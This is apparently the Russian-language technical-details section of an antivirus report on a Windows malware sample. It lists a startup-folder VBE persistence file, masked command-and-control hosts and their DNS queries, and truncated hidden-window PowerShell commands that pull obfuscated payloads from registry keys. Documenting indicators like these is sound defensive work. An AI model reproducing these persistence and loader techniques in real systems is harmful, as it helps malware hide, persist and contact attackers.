Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\mastrs.vbe
- 'de####r.ddns.com.br':5552
- 'in####ndent.co.uk':443
- DNS ASK de####r.ddns.com.br
- DNS ASK in####ndent.co.uk
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -ExecutionPolicy UnRestricted -Windo 1 -windowstyle hidden -noprofile -Command "$QoEsNOQpR = (get-itemproperty -path 'HKCU:\KJtiLVBXHVboNSeryEeDVdavDUnJAvIBtfFBFzMbbsp\TDEVnOPoebtDN...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -ExecutionPolicy UnRestricted -Windo 1 -windowstyle hidden -noprofile -Command "$FuNSoNWGyhvKKWWCDpbcsKrCAbhFDDyahBySvoo = (get-itemproperty -path 'HKCU:\uFaVNHpCebiR\wUAVQWGABrUcsi...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -ExecutionPolicy UnRestricted -Windo 1 -windowstyle hidden -noprofile -Command "$QoEsNOQpR = (get-itemproperty -path 'HKCU:\KJtiLVBXHVboNSeryEeDVdavDUnJAvIBtfFBFzMbbsp\TDEVnOPoebtDN...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -ExecutionPolicy UnRestricted -Windo 1 -windowstyle hidden -noprofile -Command "$FuNSoNWGyhvKKWWCDpbcsKrCAbhFDDyahBySvoo = (get-itemproperty -path 'HKCU:\uFaVNHpCebiR\wUAVQWGABrUcsi...